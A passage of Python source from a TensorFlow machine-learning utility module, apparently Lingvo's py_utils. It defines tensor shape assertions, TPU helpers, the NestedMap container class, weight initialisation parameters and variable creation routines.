filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.io.gfile.GFile(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
'Rank of tensor %d did not exceed the expected value %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies(
[tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor`
Raises:
A runtime error if the assertion fails.
"""
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'BABELFISH ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
return with_dependencies([
ops.assert_shape_match(
tf.shape(tensor)[:ndims], expected_shape, msg=msg)
], tensor)
else:
return tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
def GetSize(tensor):
shape = GetShape(tensor)
if (isinstance(shape, tf.Tensor) or
any([isinstance(x, tf.Tensor) for x in shape])):
return tf.size(tensor)
return np.prod(shape)
def use_xla(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device')
if res:
assert res in ('', 'cpu', 'gpu', 'tpu')
return res
def use_tpu(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device') == 'tpu'
if res:
assert not _FromGlobal('enable_asserts') # asserts not supported on tpu
return res
def tpu_compat(): # pylint: disable=invalid-name
return use_tpu() or _FromGlobal('tpu_compatible')
def use_resource_variables(): # pylint: disable=invalid-name
return _FromGlobal('use_resource_var') or tpu_compat()
@contextlib.contextmanager
def outside_all_rewrites(): # pylint: disable=invalid-name
with tf.control_dependencies(None):
yield
class _ThreadLocalStack(threading.local):
def __init__(self):
super(_ThreadLocalStack, self).__init__()
self.stack = []
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
@py_utils.tpu_host()
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
_tpu_device_assignment = None
def SetTpuDeviceAssignment(tpu_device_assignment):
global _tpu_device_assignment
if _tpu_device_assignment is not None:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment = tpu_device_assignment
# This function should called in unittest only.
def ClearTpuDevice():
global _tpu_device_assignment
_tpu_device_assignment = None
def GetTpuDeviceAssignment():
return _tpu_device_assignment
def SessionConfig(soft_placement=True,
inline=True,
cluster_def=None,
disable_meta_optimizer=False):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
disable_meta_optimizer: Turns off grappler/metagraph optimizer.
Returns:
A TF session config proto.
"""
session_config = tf.config_pb2.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
if disable_meta_optimizer:
# Useful if start-up time is critical.
session_config.graph_options.rewrite_options.disable_meta_optimizer = True
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
_NAME_PATTERN = re.compile('[A-Za-z_][A-Za-z0-9_]*')
class NestedMap(dict):
"""A simple helper to maintain a dict.
It is a sub-class of dict with the following extensions/restrictions:
- It supports attr access to its members (see examples below).
- Member keys have to be valid identifiers.
E.g.::
>>> foo = NestedMap()
>>> foo['x'] = 10
>>> foo.y = 20
>>> assert foo.x * 2 == foo.y
"""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
# keys in this list are not allowed in a NestedMap.
_RESERVED_KEYS = set(dir(dict))
# sentinel value for deleting keys used in Filter.
_DELETE = object()
def __init__(self, *args, **kwargs):
super(NestedMap, self).__init__(*args, **kwargs)
for key in self.keys():
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s,'
' value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
def __setitem__(self, key, value):
# Make sure key is a valid expression and is not one of the reserved
# attributes.
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s, '
'value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
super(NestedMap, self).__setitem__(key, value)
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def __delattr__(self, name):
try:
del self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def copy(self): # Don't delegate w/ super: dict.copy() -> dict.
return NestedMap(self)
def __deepcopy__(self, unused_memo):
"""Deep-copies the structure but not the leaf objects."""
return self.DeepCopy()
def DeepCopy(self):
"""Deep-copies the structure but not the leaf objects."""
return self.Pack(self.Flatten())
@staticmethod
def FromNestedDict(x):
"""Converts every dict in nested structure 'x' to a NestedMap."""
if isinstance(x, dict):
res = NestedMap()
for k, v in six.iteritems(x):
res[k] = NestedMap.FromNestedDict(v)
return res
elif isinstance(x, (list, tuple)):
return type(x)(NestedMap.FromNestedDict(v) for v in x)
else:
return x
@staticmethod
def CheckKey(key):
"""Asserts that key is valid NestedMap key."""
if not (isinstance(key, six.string_types) and _NAME_PATTERN.match(key)):
raise ValueError('Invalid NestedMap key \'{}\''.format(key))
def GetItem(self, key):
"""Gets the value for the nested `key`.
Note that indexing lists is not supported, names with underscores will be
considered as one key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
Returns:
The value for the given nested key.
Raises:
KeyError if a key is not present.
"""
current = self
# Note: This can't support lists. List keys are ambiguous as underscore is
# not reserved for list indexing but also allowed to be used in keys.
# E.g., this is a valid nested map where the key 'a_0' is not well defined
# {'a_0': 3, 'a': [4]}.
for k in key.split('.'):
current = current[k]
return current
def Get(self, key, default=None):
"""Gets the value for nested `key`, returns `default` if key does not exist.
Note that indexing lists is not supported, names with underscores will be
considered as one key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
default: Optional default value, defaults to None.
Returns:
The value for the given nested key or `default` if the key does not exist.
"""
try:
return self.GetItem(key)
# TypeError is raised when an intermediate item is a list and we try to
# access an element of it with a string.
except (KeyError, TypeError):
return default
def Set(self, key, value):
"""Sets the value for a nested key.
Note that indexing lists is not supported, names with underscores will be
considered as one key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
value: The value to insert.
Raises:
ValueError if a sub key is not a NestedMap or dict.
"""
current = self
sub_keys = key.split('.')
for i, k in enumerate(sub_keys):
self.CheckKey(k)
# We have reached the terminal node, set the value.
if i == (len(sub_keys) - 1):
current[k] = value
else:
if k not in current:
current[k] = NestedMap()
if not isinstance(current[k], (dict, NestedMap)):
raise ValueError('Error while setting key {}. Sub key "{}" is of type'
' {} but must be a dict or NestedMap.'
''.format(key, k, type(current[k])))
current = current[k]
def _RecursiveMap(self, fn, flatten=False):
"""Traverse recursively into lists and NestedMaps applying `fn`.
Args:
fn: The function to apply to each item (leaf node).
flatten: If true, the result should be a single flat list. Otherwise the
result will have the same structure as this NestedMap.
Returns:
The result of applying fn.
"""
def Recurse(v, key=''):
"""Helper function for _RecursiveMap."""
if isinstance(v, NestedMap):
ret = [] if flatten else NestedMap()
deleted = False
for k in sorted(v.keys()):
res = Recurse(v[k], key + '.' + k if key else k)
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret[k] = res
if not ret and deleted:
return self._DELETE
return ret
elif isinstance(v, list):
ret = []
deleted = False
for i, x in enumerate(v):
res = Recurse(x, '%s[%d]' % (key, i))
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret.append(res)
if not ret and deleted:
return self._DELETE
return ret
else:
ret = fn(key, v)
if flatten:
ret = [ret]
return ret
res = Recurse(self)
if res is self._DELETE:
return [] if flatten else NestedMap()
return res
def Flatten(self):
"""Returns a list containing the flattened values in the `.NestedMap`.
Unlike py_utils.Flatten(), this will only descend into lists and NestedMaps
and not dicts, tuples, or namedtuples.
"""
return self._RecursiveMap(lambda _, v: v, flatten=True)
def FlattenItems(self):
"""Flatten the `.NestedMap` and returns <key, value> pairs in a list.
Returns:
A list of <key, value> pairs, where keys for nested entries will be
represented in the form of `foo.bar[10].baz`.
"""
return self._RecursiveMap(lambda k, v: (k, v), flatten=True)
def Pack(self, lst):
"""Returns a copy of this with each value replaced by a value in lst."""
assert len(self.FlattenItems()) == len(lst)
v_iter = iter(lst)
return self._RecursiveMap(lambda unused_k, unused_v: next(v_iter))
def Transform(self, fn):
"""Returns a copy of this `.NestedMap` with fn applied on each value."""
return self._RecursiveMap(lambda _, v: fn(v))
def IsCompatible(self, other):
"""Returns true if self and other are compatible.
If x and y are two compatible `.NestedMap`, `x.Pack(y.Flatten())` produces y
and vice versa.
Args:
other: Another `.NestedMap`.
"""
items = self._RecursiveMap(lambda k, _: k, flatten=True)
other_items = other._RecursiveMap(lambda k, _: k, flatten=True) # pylint: disable=protected-access
return items == other_items
def Filter(self, fn):
"""Returns a copy with entries where fn(entry) is True."""
return self.FilterKeyVal(lambda _, v: fn(v))
def FilterKeyVal(self, fn):
"""Returns a copy of this `.NestedMap` filtered by fn.
If fn(key, entry) is True, the entry is copied into the returned NestedMap.
Otherwise, it is not copied.
Args:
fn: a callable of (string, entry)->boolean.
Returns:
A `.NestedMap` contains copied entries from this `'.NestedMap`.
"""
return self._RecursiveMap(lambda k, v: v if fn(k, v) else self._DELETE)
def _ToStrings(self):
"""Returns debug strings in a list for this `.NestedMap`."""
kv = self.FlattenItems()
maxlen = max([len(k) for k, _ in kv]) if kv else 0
return sorted([k + ' ' * (4 + maxlen - len(k)) + str(v) for k, v in kv])
def DebugString(self):
"""Returns a debug string for this `.NestedMap`."""
return '\n'.join(self._ToStrings())
def VLog(self, level=None, prefix=None):
"""Logs the debug string at the level."""
if level is None:
level = 0
if prefix is None:
prefix = 'nmap: '
for l in self._ToStrings():
tf.logging.vlog(level, '%s %s', prefix, l)
class _Unique(object):
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (id(v) in self._vset):
return False
else:
self._vset.add(id(v))
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper(object):
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler(object):
"""A reservoir sampler.
This class implements reservoir sampling: Given a limit of `num_samples` total
samples, this class maintains a uniform probability (1 / `num_samples`) of
keeping any item dynamically added to the sampler.
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
class RNNCellStateInit(object):
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
shape: A array of ints/symbols for specifying the shape of the state.
init: Hyperparameters as returned by one of the static implemetaitons in
RNNCellStateInit.
dtype: The dype of the states. Defaults to tf.float32.
name: An optional name for the operation.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
class WeightInit(object):
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed):
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random.uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random.uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature for user picking up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
def IsDefaultParamInit(p):
return (p.method == 'xavier' and p.scale == _DEFAULT_XAVIER_INIT and
p.seed is None)
def WeightParams(shape,
init=None,
dtype=None,
collections=None,
xla_num_partitions=None,
xla_partition_dim=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
p.Define('xla_num_partitions', xla_num_partitions, 'partitoning')
p.Define('xla_partition_dim', xla_partition_dim, 'partitoning')
return p
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
def FindNeededInList(tensor_list, endpoints):
"""Return tensors from tensor_list needed to compute any of endpoints."""
all_needed = FindNeeded(endpoints)
return [t for t in tensor_list if t.name in all_needed]
class _CollectionGetter(object):
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
return key.replace('[', '_').replace(']', '')
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With OPPORTUNISTIC_VARIABLE_REUSE==True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse new variables or get new ones
_OPPORTUNISTIC_VARIABLE_REUSE_KEY = ('__lingvo_opportunistic_variable_reuse',)
_get_opportunistic_variable_reuse = _CollectionGetter(
_OPPORTUNISTIC_VARIABLE_REUSE_KEY, lambda: [False])
_VARIABLE_RENAME_RULES_KEY = ('__lingvo_variable_rename_rules',)
_get_rename_rules_stack = _CollectionGetter(_VARIABLE_RENAME_RULES_KEY,
lambda: [])
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
old_val = opportunistic_var_reuse[0]
opportunistic_var_reuse[0] = enable_opportunistic_reuse
yield
opportunistic_var_reuse[0] = old_val
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
return opportunistic_var_reuse[0]
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
rename_rules_stack = _get_rename_rules_stack()
rename_rules_stack.append(renames)
yield
rename_rules_stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _get_rename_rules_stack():
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
def GenerateSeedFromName(name):
"""Generate a random seed from a name string."""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return int(md5.hexdigest(), 16) % (2**31 - 1)
# To keep track of all the variables ever gets created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})
_VARIABLE_SHAPE_PREFIXES = _ThreadLocalStack().stack
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
Args:
shape_prefix: a positive integer of shape prefix.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.append(shape_prefix)
yield
_VARIABLE_SHAPE_PREFIXES.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES
def GetFanInFanOut(shape):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < 1:
return 1, 1
elif len(shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return shape[0], shape[0]
else:
receptive_field_size = 1
for s in shape[:-2]:
receptive_field_size *= s
fan_in = shape[-2] * receptive_field_size
fan_out = shape[-1] * receptive_field_size
return fan_in, fan_out
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
tf.identity(var), var pair. The tf.identity() node is colocated
with var. In the case of FLAGS.no_identity_on_vars, simply returns
a var, var pair.
"""
p = params.Copy()
assert isinstance(p, hyperparams.Params)
dtype = p.dtype
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
p.Set(shape=shape)
dim0 = 1
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
seed = GenerateSeedFromName(var_name)
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
init_dtype = dtype.real_dtype
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout'
]:
v_init = init_ops.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = init_ops.random_uniform_initializer(
